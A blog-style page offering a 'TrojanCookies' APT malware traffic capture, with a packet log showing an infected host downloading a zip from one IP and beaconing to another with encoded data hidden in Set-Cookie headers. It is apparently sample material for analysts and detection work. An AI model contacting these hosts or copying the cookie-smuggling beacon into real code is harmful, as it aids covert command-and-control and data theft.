APT TrojanCookies Malware Traffic Sample Trojan PCAP Download

By | January 29, 2016

Download TrojanCookies APT PCAP Sample : trojancookies.pcap

 

2013-01-05 22:41:53.771374 IP 172.16.253.130.1092 > 117.55.241.58.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279: HTTP: GET /indexs.zip HTTP/1.1
E..?.a@….R….u7.:.D.P…\..A P…S…GET /indexs.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 117.55.241.58
Connection: Keep-Alive
2013-01-05 22:41:53.771571 IP 117.55.241.58.80 > 172.16.253.130.1092: Flags [.], ack 280, win 64240, length 0
E..(-]…..mu7.:…..P.D..A …sP………….
2013-01-05 22:41:54.094611 IP 117.55.241.58.80 > 172.16.253.130.1092: Flags [P.], seq 1:1461, ack 280, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…-^……u7.:…..P.D..A …sP…….HTTP/1.1 200 OK
Content-Length: 114696
Content-Type: application/x-zip-compressed
Last-Modified: Thu, 24 Jan 2013 07:08:57 GMT
Accept-Ranges: bytes
ETag: “36c67bad1facd1:1c6d3”
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 30 Jan 2013 03:34:42 GMT

2013-01-05 22:41:57.398529 IP 172.16.253.130.1093 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.E.P.`……P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AQ8cIykwOUBGTVRaZGpxd37VYTR4d1mOKAnsKi5caRjlbe8Dnh66ZuvW9XyoBCJGTSRWPigvIUHsIR3KjiXZNqeIjqyoUwJPSMohKy+8+p0ugEk2gnrQvSJKWfkuLamQov0ILFxX//BehMNEX3P4sOrSF4JKBvtaAQaBTA1/PaelJ17yqMkdURSqcR7snK6L7gAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache

2013-01-05 22:41:58.609637 IP 172.16.253.130.1094 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.F.P7.D…m.P….\..GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AS5FUmNzg5CdscHO3Oz5CRbgmGZDAAnR7DFrbz9E22Ec8Fm3TRQV0fMySmECZO4MJct0A/K6WUNPeWyWYN7e91aeoWH5nVS2DtVtnY7ZVqj5SBHaCmHn2Ipqxu5PTcJvpaTJYehJMefihOCyJgJjaFZDPOUi2c/I2sqYIh6vJk2YuTNwQtHwNjgstq58DxYTjgAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache

2013-01-05 22:41:59.422085 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
E..]….@………..D\D\.I..{“host_int”: 356675228, “version”: [1, 8], “displayname”: “356675228”, “port”: 17500, “namespaces”: [173402115, 221980425, 81434131, 169597399, 23578136, 115911321, 206074398, 165474655, 89292257, 26249186, 69806233, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 164806200, 83940796, 139226175]}
2013-01-05 22:41:59.703740 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [S], seq 209564213, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…ok……)
.G.P.}.5….p…:1……….
2013-01-05 22:41:59.811449 IP 184.22.41.10.80 > 172.16.253.130.1095: Flags [S.], seq 2093017231, ack 209564214, win 64240, options [mss 1460], length 0
E..,-……`..)
…..P.G|….}.6`………….
2013-01-05 22:41:59.811507 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…or……)
.G.P.}.6|…P…….
2013-01-05 22:41:59.811859 IP 172.16.253.130.1095 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…m…….)
.G.P.}.6|…P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: Aej4BRIfLDZDUF1qd4GOm6V0pE/nx2gMQgXnTabLrDG/gIVTURAa6iAdP5+uybCFbWBsTi99Ceg0paBJIJJ8SwJ/jRmTSHDoupkThSRwTsNJkwR8wfyR8YV+1xD8iz+kzR1CtrfR7olzp2dsnp+Wgyu1WCjeo7bsMG4nGq6DHAyFi2qk/Rzh5YLoM+bwQN2+ZgAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache

 

2013-01-05 22:42:29.443499 IP 172.16.253.1.17500 > 172.16.253.255.17500: UDP, length 321
E..]….@..m……..D\D\.I..{“host_int”: 356675228, “version”: [1, 8], “displayname”: “356675228”, “port”: 17500, “namespaces”: [173402115, 221980425, 81434131, 169597399, 23578136, 115911321, 206074398, 165474655, 89292257, 26249186, 69806233, 87070436, 98532453, 102394472, 68274857, 125331760, 93464947, 87860457, 164806200, 83940796, 139226175]}
2013-01-05 22:42:30.173010 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [S], seq 1965195895, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…oN……)
.P.Pu”.w….p….A……….
2013-01-05 22:42:30.280498 IP 184.22.41.10.80 > 172.16.253.130.1104: Flags [S.], seq 3239884347, ack 1965195896, win 64240, options [mss 1460], length 0
E..,-……G..)
…..P.P…;u”.x`………….
2013-01-05 22:42:30.280566 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [.], ack 1, win 64240, length 0
E..(..@…oU……)
.P.Pu”.x…<P…….
2013-01-05 22:42:30.280868 IP 172.16.253.130.1104 > 184.22.41.10.80: Flags [P.], seq 1:485, ack 1, win 64240, length 484: HTTP: GET / HTTP/1.1
E…..@…mp……)
.P.Pu”.x…<P…….GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Set-Cookie: AR0uO0RRX2h1f4yZo7C9x9QYPVyZXtpP+RD9ajqe1y4uj2IpzAeer9zbGYcLK2X7whwmbN3qvn023RzcnGBgL95kqq62vc/yFd8TnWFxQRysDDYxTmW91Xdpjo8UWn8wB6m1AiWaS5Ya4e0WTCFlCE4Yep6yro43ijU8tUpocsHX5OK3zQ4s1Qb7TAIAuhdumAAA
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: 184.22.41.10
Connection: Keep-Alive
Cache-Control: no-cache

Share Button

One thought on “APT TrojanCookies Malware Traffic Sample Trojan PCAP Download

  1. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *